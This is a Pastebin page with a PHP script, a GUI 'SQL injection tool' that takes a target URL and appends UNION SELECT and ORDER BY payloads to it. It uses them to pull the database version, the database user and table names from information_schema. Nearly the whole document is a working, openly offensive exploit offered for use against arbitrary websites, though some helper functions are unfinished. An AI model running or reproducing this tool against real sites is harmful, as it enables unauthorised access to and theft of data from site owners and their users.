Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (!class_exists('gtk')) {
- die("Please load the php-gtk2 module in your php.ini\r\n");
- }
- function on_interactive_dialog_clicked($aTxtBoxA,$aTxtBoxB)
- {
- $target = $aTxtBoxA->get_text();
- $scannerObject = new scanner($target);
- $table = $scannerObject->returnTables();
- foreach ($table as $value)
- {
- $textBoxValue.= $value.",";
- }
- $aTxtBoxB->set_text($textBoxValue);
- }
- $wnd = new GtkWindow();
- $wnd->set_title('C0BRA SQL INJECTION TOOL');
- $wnd->connect_simple('destroy', array('gtk', 'main_quit'));
- $lblCredit = new GtkLabel('Please Enter URI To Attack');
- $lblUsername = new GtkLabel('_Site Uri', true);
- $lblTables = new GtkLabel('_Tables', true);
- $txtBoxA = new GtkEntry();
- $txtBoxB = new GtkEntry();
- $txtPassword = new GtkEntry();
- $btnAttack = new GtkButton('_Attack');
- $btnCancel = new GtkButton('_Quit');
- $btnCancel->connect_simple('clicked', array($wnd, 'destroy'));
- $btnAttack->connect_simple('clicked', 'on_interactive_dialog_clicked',$txtBoxA,$txtBoxB);
- $tbl = new GtkTable(4, 2);
- $tbl->attach($lblCredit, 0, 2, 0, 1);
- $tbl->attach($lblUsername, 0, 1, 1, 2);
- $tbl->attach($txtBoxA, 1, 2, 1, 2);
- $tbl->attach($txtBoxB, 0, 2, 2, 3);
- $bbox = new GtkHButtonBox();
- $bbox->set_layout(Gtk::BUTTONBOX_EDGE);
- $bbox->add($btnCancel);
- $bbox->add($btnAttack);
- $vbox = new GtkVBox();
- $vbox->pack_start($tbl);
- $vbox->pack_start($bbox);
- $wnd->add($vbox);
- $textBuffer = new GtkTextBuffer();
- $textView = new GtkTextView();
- $wnd->show_all();
- //Start the main loop
- Gtk::main();
- class scanner {
- protected $originalSiteToAttack;
- protected $siteStrln;
- function __construct($aSite = "")
- {
- $this->originalSiteToAttack = $aSite;
- $this->siteStrln = strlen($this->originalSiteToAttack);
- }
- private function numberOfRows()
- {
- $originalSiteToAttack = $this->originalSiteToAttack;
- $originalSiteToAttack.= "%20order%20by%201--";
- $defHtml = file_get_contents($originalSiteToAttack);
- for ($i=1;$i<5;$i++)
- {
- if ($i != 1)
- {
- $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln);
- $originalSiteToAttack = $originalSiteToAttack . "%20order%20by%20$i--";
- }
- $notDefHtml = file_get_contents($originalSiteToAttack);
- if (strlen($notDefHtml) != strlen($defHtml))
- {
- return --$i;
- }
- }
- }
- private function buildQuery($aOption,$aTable='')
- {
- $originalSiteToAttack = $this->originalSiteToAttack;
- $numberOfRows = 2;
- //$numberOfRows = $this->numberOfRowsVar;
- $fieldChar = substr($originalSiteToAttack, -1);
- $fieldChar = "-$fieldChar";
- $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln-1);
- $originalSiteToAttack.="$fieldChar";
- $originalSiteToAttack .= "%20union%20select%20";
- switch ($aOption)
- {
- case "version":
- for ($i=1;$i<=$numberOfRows;$i++)
- {
- if ($i==$numberOfRows)
- {
- $originalSiteToAttack.= "@@version%20";
- break;
- }
- //the hex code king
- $originalSiteToAttack.= "@@version%20,";
- }
- $originalSiteToAttack.="--";
- return $originalSiteToAttack;
- break;
- case "vulnurbilityfield":
- for ($i=1;$i<=$numberOfRows;$i++)
- {
- if ($i==$numberOfRows)
- {
- $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
- break;
- }
- //the hex code king
- $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
- }
- $originalSiteToAttack.="--";
- return $originalSiteToAttack;
- break;
- case "dbuser":
- for ($i=1;$i<=$numberOfRows;$i++)
- {
- if ($i==$numberOfRows)
- {
- $originalSiteToAttack.= "user()";
- break;
- }
- //the hex code king
- $originalSiteToAttack.= "user(),";
- }
- $originalSiteToAttack.="--";
- return $originalSiteToAttack;
- break;
- case "numberoftables":
- for ($i=1;$i<=$numberOfRows;$i++)
- {
- if ($i==$numberOfRows)
- {
- $originalSiteToAttack.= "COUNT(*)";
- break;
- }
- //the hex code king
- $originalSiteToAttack.= "COUNT(*),";
- }
- $originalSiteToAttack.="%20from%20information_schema.tables--";
- return $originalSiteToAttack;
- break;
- case "tables":
- for ($i=1;$i<=$numberOfRows;$i++)
- {
- if ($i==$numberOfRows)
- {
- $originalSiteToAttack.= "table_name";
- break;
- }
- //the hex code king
- $originalSiteToAttack.= "table_name,";
- }
- $originalSiteToAttack.="%20from%20information_schema.tables%20limit%20$aTable,1--";
- return $originalSiteToAttack;
- break;
- }
- }
- private function numberOfTables()
- {
- $originalSiteToAttack = $this->buildQuery("numberoftables");
- $defHtml = file_get_contents($originalSiteToAttack);
- $relPosition = $this->locateVulnFieldPos();
- return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
- }
- private function versionNumber()
- {
- $originalSiteToAttack = $this->buildQuery("version");
- $defHtml = file_get_contents($originalSiteToAttack);
- $relPosition = $this->locateVulnFieldPos();
- return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
- }
- private function dbUser()
- {
- $originalSiteToAttack = $this->buildQuery("dbuser");
- $defHtml = file_get_contents($originalSiteToAttack);
- $relPosition = $this->locateVulnFieldPos();
- return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
- }
- private function locateVulnFieldPos()
- {
- $originalSiteToAttack = $this->buildQuery("vulnurbilityfield");
- $defHtml = file_get_contents($originalSiteToAttack);
- $pos = strpos($defHtml, "king");
- return $pos;
- }
- public function returnTables()
- {
- $numberOfTables = $this->numberOfTables();
- for ($i=0;$i<=4;$i++)
- {
- $originalSiteToAttack = $this->buildQuery("tables",$i);
- echo $originalSiteToAttack."\n";
- $defHtml = file_get_contents($originalSiteToAttack);
- $relPosition = $this->locateVulnFieldPos();
- $arrayToReturn[$i] = substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
- }
- return ($arrayToReturn);
- }
- private function findVulnField()
- {
- $originalSiteToAttack = $this->originalSiteToAttack;
- $originalSiteToAttack .= "%20union%20select%20";
- $siteStrln = $this->siteStrln;
- $pattern = '/&.*/';
- preg_match($pattern, $originalSiteToAttack, $matches);
- $explodedGets = explode("&",$matches[0]);
- //$numberOfRows = $this->getNumberOfRows();
- $numberOfRows = 2;
- for ($i=1;$i<count($explodedGets);$i++)
- {
- $pos = strpos($explodedGets[$i], "=");
- $pos++;
- $strCutedA = substr($explodedGets[$i], 0, $pos);
- $strCutedB = substr($explodedGets[$i], $pos, strlen($explodedGets[$i]));
- $strCutedB = preg_replace('/%.*/', "", $strCutedB);
- $explodedGetsB[$i] = $strCutedA."-".$strCutedB;
- }
- for ($i=1;$i<=count($explodedGetsB);$i++)
- {
- echo "$$$$$$$".$i."\n";
- $originalSiteToAttack = str_replace($explodedGets[$i],$explodedGetsB[$i],$originalSiteToAttack);
- for ($j=1;$j<=$numberOfRows;$j++)
- {
- if ($j==$numberOfRows)
- {
- $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
- //break;
- }
- //the hex code king
- $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
- }
- $originalSiteToAttack.="--";
- echo $originalSiteToAttack."\n";
- //$defHtml = file_get_contents($originalSiteToAttack);
- //$pos = strrpos($defHtml,"king");
- //echo $pos;
- }
- }
- public function getVulbField()
- {
- $this->vulnField = $this->findVulnField();
- return $this->vulnField;
- }
- public function getVersionNumber()
- {
- $this->dbVersion = $this->versionNumber();
- return $this->dbVersion ;
- }
- private function getNumberOfRows()
- {
- $this->numberOfRowsVar = $this->numberOfRows();
- return $this->numberOfRowsVar."\n";
- }
- public function getUser()
- {
- $this->dbUserField = $this->dbUser();
- return $this->dbUserField;
- }
- private function getNumberOfTables()
- {
- $this->numberTables = $this->numberOfTables();
- return $this->numberTables;
- }
- private function getTables()
- {
- $numberOfTables = $this->getNumberOfTables();
- }
- public function __toString()
- {
- return $this->originalSiteToAttack;
- }
- }
- $arguments = getopt("t:d:");
- $target = $arguments["t"];
- $db = $arguments["d"];
- //$scannerObject = new scanner($target);
- //echo $scannerObject->getVersionNumber();
- //echo $scannerObject->getUser();
- //echo $scannerObject->returnTables();
- //echo $scannerObject->getVulbField();
- //for ($i=0; $i<strlen($string); $i++) {
- // echo $string[$i];
- //}
- ?>
Add Comment
Please, Sign In to add comment